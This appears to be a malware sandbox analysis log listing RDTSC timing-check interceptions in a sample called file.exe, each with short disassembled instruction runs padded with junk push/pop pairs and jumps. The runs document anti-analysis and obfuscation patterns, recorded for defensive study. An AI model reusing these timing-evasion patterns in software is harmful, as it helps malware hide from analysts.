Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BAAE2C second address: BAAE3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C15494 second address: C15498 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C15498 second address: C154AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FE4211E2ABDh 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C154AF second address: C154F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE420CEA018h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FE420CEA00Fh 0x00000011 pushad 0x00000012 popad 0x00000013 pop eax 0x00000014 popad 0x00000015 pushad 0x00000016 jmp 00007FE420CEA00Ah 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C154F0 second address: C154F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C15AB5 second address: C15ABB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C15D5E second address: C15D6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE4211E2ABBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C16088 second address: C1608C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1608C second address: C160B3 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FE4211E2AB6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jno 00007FE4211E2AC2h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C160B3 second address: C160B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C160B7 second address: C160C1 instructions: 0x00000000 rdtsc 0x00000002 js 00007FE4211E2AB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C160C1 second address: C160DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE420CEA017h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C160DE second address: C160E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C160E2 second address: C16116 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FE420CEA006h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007FE420CEA017h 0x00000010 jmp 00007FE420CEA00Eh 0x00000015 push esi 0x00000016 pop esi 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C162A3 second address: C162B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 pushad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C162B1 second address: C162B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C162B7 second address: C162C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C162C3 second address: C162CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C162CC second address: C162D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C162D2 second address: C162D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1A790 second address: C1A7A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jns 00007FE4211E2AB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1A7A2 second address: C1A7A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1A7A6 second address: C1A7AC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1A7AC second address: C1A7B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1AE2E second address: C1AE42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jnc 00007FE4211E2AB6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1AE42 second address: C1AE49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1AE49 second address: C1AE52 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1B179 second address: C1B17F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1B17F second address: C1B186 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1B186 second address: C1B197 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FE420CEA00Ch 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1B197 second address: C1B19D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1B19D second address: C1B1C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jl 00007FE420CEA006h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edi 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FE420CEA010h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1B1C1 second address: C1B1C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1B1C5 second address: C1B1C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1B610 second address: C1B635 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jns 00007FE4211E2AC7h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1FEBC second address: C1FEF2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE420CEA018h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007FE420CEA00Eh 0x0000000f push ecx 0x00000010 je 00007FE420CEA006h 0x00000016 pop ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C2002B second address: C20031 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1FB8C second address: C1FBB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FE420CEA013h 0x0000000b jno 00007FE420CEA006h 0x00000011 jns 00007FE420CEA006h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C20848 second address: C20857 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FE4211E2AB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C20857 second address: C2085D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C209D1 second address: C209E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE4211E2ABDh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C209E3 second address: C209EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C209EB second address: C209EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C209EF second address: C20A08 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FE420CEA00Bh 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 pop edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C29FD4 second address: C29FE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push ebx 0x00000008 jg 00007FE4211E2AB6h 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BA928B second address: BA9295 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FE420CEA006h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BA9295 second address: BA929C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE97E3 second address: BE97E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE99E7 second address: BE99F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4211E2ABDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE99F8 second address: BE9A12 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE420CEA011h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ecx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE9DE2 second address: BE9DFD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4211E2AC3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE9DFD second address: BE9E01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE9E01 second address: BE9E05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE9E05 second address: BE9E13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE9E13 second address: BE9E17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE9E17 second address: BE9E1D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE9EA2 second address: BE9EFE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jmp 00007FE4211E2AC4h 0x00000010 mov eax, dword ptr [eax] 0x00000012 jmp 00007FE4211E2ABEh 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b jmp 00007FE4211E2AC4h 0x00000020 pop eax 0x00000021 sbb di, C26Ah 0x00000026 call 00007FE4211E2AB9h 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE9EFE second address: BE9F16 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE420CEA014h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE9F16 second address: BE9F43 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FE4211E2ABCh 0x00000008 jc 00007FE4211E2AB6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push ecx 0x00000012 jno 00007FE4211E2AB8h 0x00000018 pop ecx 0x00000019 mov eax, dword ptr [esp+04h] 0x0000001d push eax 0x0000001e push edx 0x0000001f jnl 00007FE4211E2ABCh 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE9F43 second address: BE9F60 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE420CEA011h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE9F60 second address: BE9F7A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4211E2ABDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEA049 second address: BEA04D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEA1CC second address: BEA20B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4211E2AC8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jo 00007FE4211E2ACAh 0x00000010 jmp 00007FE4211E2AC4h 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 push edi 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEA20B second address: BEA22B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edi 0x00000008 mov eax, dword ptr [eax] 0x0000000a jmp 00007FE420CEA00Eh 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 push ecx 0x00000014 push ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEAC07 second address: BEAC51 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4211E2AC2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007FE4211E2AB8h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 00000017h 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 mov edi, 4F79BE00h 0x00000029 lea eax, dword ptr [ebp+1247E51Fh] 0x0000002f mov ecx, edi 0x00000031 push eax 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 push esi 0x00000037 pop esi 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEAC51 second address: BEAC5B instructions: 0x00000000 rdtsc 0x00000002 jg 00007FE420CEA006h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEAC5B second address: BD121B instructions: 0x00000000 rdtsc 0x00000002 jc 00007FE4211E2ABCh 0x00000008 jno 00007FE4211E2AB6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], eax 0x00000013 push 00000000h 0x00000015 push edx 0x00000016 call 00007FE4211E2AB8h 0x0000001b pop edx 0x0000001c mov dword ptr [esp+04h], edx 0x00000020 add dword ptr [esp+04h], 00000014h 0x00000028 inc edx 0x00000029 push edx 0x0000002a ret 0x0000002b pop edx 0x0000002c ret 0x0000002d lea eax, dword ptr [ebp+1247E4DBh] 0x00000033 mov dword ptr [ebp+12452C48h], ebx 0x00000039 push eax 0x0000003a jmp 00007FE4211E2AC5h 0x0000003f mov dword ptr [esp], eax 0x00000042 call dword ptr [ebp+122D3194h] 0x00000048 push ebx 0x00000049 pushad 0x0000004a push esi 0x0000004b pop esi 0x0000004c push eax 0x0000004d push edx 0x0000004e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C29147 second address: C2914C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C29426 second address: C2944A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4211E2ABFh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jnc 00007FE4211E2AB6h 0x00000012 jno 00007FE4211E2AB6h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C295A2 second address: C295D2 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FE420CEA006h 0x00000008 jno 00007FE420CEA006h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007FE420CEA00Eh 0x00000015 pop esi 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FE420CEA00Fh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C29705 second address: C29710 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FE4211E2AB6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C29710 second address: C29722 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FE420CEA00Ch 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C298AE second address: C298B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C298B2 second address: C298CA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jnp 00007FE420CEA006h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jns 00007FE420CEA008h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 pop eax 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C298CA second address: C298E7 instructions: 0x00000000 rdtsc 0x00000002 js 00007FE4211E2AB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE4211E2ABFh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C298E7 second address: C298EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C29BA5 second address: C29BAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C29BAB second address: C29BB7 instructions: 0x00000000 rdtsc 0x00000002 js 00007FE420CEA006h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C2DEE5 second address: C2DEF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C2DEF3 second address: C2DF02 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FE420CEA008h 0x00000008 pushad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C391CE second address: C391D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C391D9 second address: C391DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C391DD second address: C391F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE4211E2ABBh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jnl 00007FE4211E2AB8h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C37D04 second address: C37D0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C37E73 second address: C37E7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C37E7C second address: C37E91 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pop ecx 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C37E91 second address: C37EA7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4211E2AC2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C37EA7 second address: C37EC3 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FE420CEA008h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE420CEA010h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C38015 second address: C3801B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3801B second address: C3801F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3801F second address: C38037 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jnc 00007FE4211E2AB6h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pop ecx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C38037 second address: C3803D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
